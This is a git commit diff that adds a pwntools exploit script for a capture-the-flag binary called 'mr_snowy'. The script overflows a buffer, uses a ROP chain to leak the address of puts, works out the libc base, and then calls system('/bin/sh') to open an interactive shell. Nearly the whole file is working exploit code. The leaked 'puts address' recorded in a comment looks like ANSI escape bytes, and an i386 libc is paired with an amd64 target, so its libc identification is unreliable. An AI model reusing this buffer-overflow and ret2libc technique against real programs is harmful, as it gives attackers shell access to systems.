add more work on the exploit

2021-12-06 22:35:30 +01:00
parent f7f30bb632
commit ec623b0aaa
2 changed files with 59 additions and 0 deletions
--- a/pwn/mrsnowy/kabuttmache.py
+++ b/pwn/mrsnowy/kabuttmache.py
@@ -0,0 +1,59 @@
+#!/bin/env python
+
+from pwn import *
+
+context.arch = 'amd64'
+offset = 0x48
+
+elf = ELF('./mr_snowy')
+p = elf.process()
+
+# navigate to the affected read()
+def do_read():
+  while True:
+     ll = p.read()
+     if b'>' in ll:
+       break
+
+rop = ROP(elf)
+rop.call(elf.symbols['puts'], [elf.got['puts']])
+rop.call(elf.symbols['investigate'])
+
+# assemble payload
+payload = [
+    b'\xAA'*offset,
+	rop.chain()
+]
+
+# skip menu
+do_read()
+p.sendline(b'1')
+do_read()
+
+# send payload
+p.sendline(b''.join(payload))
+puts = u64(p.recvuntil(b'\n').rstrip().ljust(8, b'\x00'))
+log.info(f'puts found at {hex(puts)}')
+
+# Note:
+# libc database search for puts address: 0x6d31333b315b1b20
+# -> libc6_2.19-18+deb8u10_i386
+# -> https://libc.blukat.me/d/libc6_2.19-18+deb8u10_i386.so
+
+libc = ELF("libc6_2.19-18+deb8u10_i386.so")
+libc.address = puts - libc.symbols["puts"]
+log.info(f'libc base address determined {hex(libc.address)}')
+
+rop = ROP(libc)
+rop.call('puts', [ next(libc.search(b'/bin/sh\x00')) ])
+rop.call('system', [ next(libc.search(b'/bin/sh\x00')) ])
+rop.call('exit')
+
+# assemble payload
+payload = [
+    b'\xAA'*offset,
+	rop.chain()
+]
+
+p.sendline(b''.join(payload))
+p.interactive()
--- a/pwn/mrsnowy/libc6_2.19-18+deb8u10_i386.so
+++ b/pwn/mrsnowy/libc6_2.19-18+deb8u10_i386.so